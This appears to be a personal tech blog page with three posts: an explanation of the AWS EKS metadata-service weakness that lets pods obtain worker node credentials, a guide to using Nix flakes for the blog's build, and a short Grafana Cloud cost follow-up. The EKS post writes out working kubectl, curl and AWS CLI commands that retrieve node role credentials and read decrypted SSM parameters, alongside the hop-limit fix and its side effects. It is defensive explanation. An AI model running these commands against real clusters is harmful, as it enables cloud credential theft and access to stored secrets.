

AWS EKS vulnerability

Before we start, I must clarify that there are no newly discovered 0‑Day vulnerabilities in this blog post. Rather, this is a moment of clarity: a realization of how bad an already known, unpatched (N‑Day) vulnerability can be under certain circumstances.

The vulnerability discussed here is that AWS EKS clusters (Kubernetes) by default allow pods to steal worker node credentials. This is bad, but the patch is relatively simple with few side effects. I will take you through how the vulnerability is exploited, an example of what would amplify the impact, how it is patched, and examples of what potentially breaks.

The exploit

When spinning up an AWS EKS cluster, depending on the method used, your worker nodes might end up with a launch template configuration that has the default hop limit of 2. This means that pods are allowed to call the instance metadata service (IMDS), because two network hops are allowed. The instance metadata service is what the EC2 instance (worker node) uses to get information about itself and its environment, including credentials, and this is where our exploit begins. Assuming you can gain access to the cluster's pods or spin up new ones, the attack looks like this. Be careful if you follow along: the credentials, even though temporary, might end up in your logs.

# Spin up a new pod with an interactive shell
kubectl run -n default -i --tty --rm debug --image=alpine:latest --restart=Never -- sh

# Install curl
apk update && apk add curl

# Get a token from the metadata service
TOKEN=$(curl -s -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")

We have now obtained a token from the metadata service that can be used to retrieve the EC2 instance role name and its credentials. Continuing in the same pod as before:

# Get the EC2 instance role name
ROLE=$(curl -s -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/iam/security-credentials/)

# Get the EC2 instance role credentials
curl -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/iam/security-credentials/$ROLE

We have now obtained a valid set of AWS credentials with the same permission scope as your EC2 instance role.
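
To see what these credentials actually are, they can be loaded into the AWS CLI. A minimal sketch, assuming the AWS CLI and jq have been installed in the pod (neither ships with alpine); the field names come from the standard IMDS credential response:

# Fetch the credential JSON again, this time into a variable
CREDS=$(curl -s -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/iam/security-credentials/$ROLE)

# Export the credentials for the AWS CLI
export AWS_ACCESS_KEY_ID=$(echo "$CREDS" | jq -r .AccessKeyId)
export AWS_SECRET_ACCESS_KEY=$(echo "$CREDS" | jq -r .SecretAccessKey)
export AWS_SESSION_TOKEN=$(echo "$CREDS" | jq -r .Token)

# Confirm the credentials work and which role they belong to
aws sts get-caller-identity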

The impact

It is very common for AWS EKS worker nodes to have permission to pull container images, read data from SSM Parameter Store, and more. In some environments where predictable naming patterns exist, decrypted access to certain secrets may still be possible even with limited list/describe permissions, which makes the impact more serious than initially expected. Some teams might prefer SSM Parameter Store for storing secrets over Secrets Manager, making the impact much worse.
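
To make that concrete, here is a hypothetical sketch of what an attacker with the exported node credentials might try; the parameter name below is made up:

# Enumerate parameters the node role can see
aws ssm describe-parameters --max-items 10

# Read a guessed or discovered parameter, decrypted
aws ssm get-parameter --name /myapp/prod/db-password --with-decryption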

The patch

To prevent pods from accessing the instance metadata service, set the EC2 instance metadata hop limit to 1 in your worker node launch templates (a sketch of the change itself follows the list below). This blocks pod‑level IMDS access while keeping node‑level functionality intact. Be aware that some Kubernetes add‑ons or deployment tooling may rely on IMDS for cluster, network, or storage metadata. These components may need additional configuration, such as supplying explicit parameters or assigning dedicated IAM roles. The exact impact varies between setups, so evaluate this change in a non‑production environment first. Here are the things I have discovered, but you might find more.

  • AWS Load Balancer Controller can no longer discover the VPC ID, so it must be supplied explicitly.
  • The EBS CSI driver first attempts to call the metadata service, fails with an error, and then falls back to getting the information from the Kubernetes API instead.
  • The Flux Image Reflector Controller can no longer pull images from ECR, so an IRSA role needs to be supplied.
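
For reference, a sketch of the change itself. On an already running node it can be applied with the AWS CLI (the instance ID below is a placeholder); the durable fix is setting the same metadata options in the launch template so that replacement nodes come up patched:

# One-off fix on a running worker node; also requires IMDSv2 tokens
aws ec2 modify-instance-metadata-options \
  --instance-id i-0123456789abcdef0 \
  --http-put-response-hop-limit 1 \
  --http-tokens required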

Disclaimer: This example reflects a generic EKS configuration and is not indicative of any specific environment.

How this blog uses Nix

Nix is an advanced tool for building, packaging, and configuring software in a reliable, reproducible, and declarative way, and it has been gaining a lot of popularity in recent years. Nix first came up on my radar around the early 2020s, but it took a couple of years before I really started investing time in it beyond just reading. It is really powerful but also very different from what I was used to. I now use NixOS as my daily driver (work and home) and use Nix Flakes to declare my development shells in various projects. In this post we will go over how I first started using Nix and how I have declared a development shell for this blog using Nix Flakes.

The word Nix is used everywhere

The term "I use Nix" can have many meanings and is sometimes confusing. Let's go over some of them here.

  • Nix the functional language
  • Nix the package manager (often mentioned together with nixpkgs, its package collection)
  • Nix the operating system, better known as NixOS

There are probably more, but I think this might illustrate where the confusion comes from. Just know that people tend to only use the word "Nix" and you have to guess the context.

Home-manager is a great place to start

I started my practical journey with Nix by porting my dotfiles and packages into the Nix ecosystem using Home-manager, a basic system for managing your user environment with the Nix package manager and Nix libraries. For me it was a great starting point, and I can really recommend this approach. At the time I was using Arch Linux, but Nix with Home-manager could easily be set up on the side, and I could slowly port my stuff when I felt like it. I also quickly found out that I have almost no system-level configuration, so I made the switch to NixOS after roughly a year and I have never looked back since. You can find my NixOS configuration at github.com/wcarlsen/config.
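
If you want to try the same approach, bootstrapping standalone Home-manager is a one-liner these days (taken from the Home-manager manual; it assumes a Nix installation with flakes enabled):

# Generates an initial home.nix and activates it
nix run home-manager/master -- init --switch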

Flakes and development shells

Flakes have at this point basically become the de facto standard when using Nix. They add a much-needed flake.lock file (updated with nix flake update), making sure your configuration is reproducible. It is pretty simple to define a development shell using flakes; let's look at a minimal example.

# flake.nix
{
  inputs = {
    nixpkgs.url = "github:nixos/nixpkgs/nixos-unstable";
    flake-utils.url = "github:numtide/flake-utils";
  };

  outputs = inputs:
    inputs.flake-utils.lib.eachDefaultSystem (system: let
      pkgs = import inputs.nixpkgs {
        inherit system;
      }; # this is just a fancy (but easy) way to define your system, e.g. x86_64-linux, aarch64-darwin, etc.
    in {
      devShells = {
        default = pkgs.mkShell {
          buildInputs = with pkgs; [
            cowsay # add your dependencies here
          ];
          shellHook = ''
            cowsay "COWABUNGA!" # add your custom shell hooks here
          '';
        };
      };
    });
}

The above flake consists of inputs, defining which branch of nixpkgs to use and flake-utils as a helper for defining systems. The other part is outputs, where we output devShells, defining only one called default using pkgs.mkShell and its attribute buildInputs to declare package dependencies. It should be noted that mkShell has other attributes as well, for example shellHook. You could imagine a simple Python project using uv as the package manager, where buildInputs would contain Python and uv, and the shellHook would run uv sync to install all Python-specific dependencies. Another example would be an OpenTofu project, where we install all providers with tofu init in the shellHook.

The devShell can be entered with the following Nix command: nix develop. I tend to use direnv and just put use flake in my .envrc file to have it automatically set up my development shell.
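
For completeness, that setup looks like this (assuming direnv is hooked into your shell; nix-direnv adds caching on top):

# .envrc in the project root; approve it once with `direnv allow`
use flake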

So how does this blog use Nix?

Now that we have some limited knowledge about Nix and Flakes, we can start looking at how this blog uses them. In the root of the GitHub project you will find a flake.nix which specifies MkDocs and all the plugins used to create this blog, and, because I use direnv, it automatically installs all dependencies and drops me into a development shell so I can start writing and validating my changes locally. I find the "holy trinity" of flakes, direnv, and make really useful. So now we have a reproducible development setup; how do we use it in places other than locally? Let's look at GitHub Actions as an example.
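
Before that, a quick note on the make part of that trinity. The targets below are hypothetical, but a thin wrapper like this is what both my local shell and the CI workflow call into (mkdocs build and mkdocs serve are the actual MkDocs commands):

# Makefile, a hypothetical thin wrapper around MkDocs
# (recipe lines must be indented with tabs)
build:
	mkdocs build --strict

serve:
	mkdocs serve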

GitHub Actions and Flakes

Because we have defined all of our dependencies in a flake, it becomes really easy to use it in a GitHub Actions workflow.

name: build
on:
  pull_request:
    branches:
      - main
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Install Nix
        uses: cachix/install-nix-action@v30
        with:
          extra_nix_config: |
            access-tokens = github.com=${{ secrets.GITHUB_TOKEN }}
      - name: Build
        run: nix develop --command make build

We see that it doesn't really require much effort at all, and changes to my local development don't require updates to my GitHub Actions workflow (unless I change the Makefile interface).

Cost savings Grafana Cloud follow up

In the previous post I wrote about our efforts to reduce the cost of Grafana Cloud metrics. There I went over the three main things we implemented:

  • Reduced sample rates
  • Filter/drop unused metrics (keep only used ones)
  • Enable adaptive metrics

but I also ended up concluding that we lacked impact feedback and only had proxy indicators. Our goal was ambitious: concretely, we set out to save 80% on our metrics bill. This post serves as a conclusion to our efforts.

Conclusion

We now know that we almost reached that goal with a 78% reduction in metrics cost alone.

Implementation aftermath

Enabling auto-mode for adaptive metrics was by far the most invasive change, and we saw some of the developers' dashboards break, but fewer than anticipated.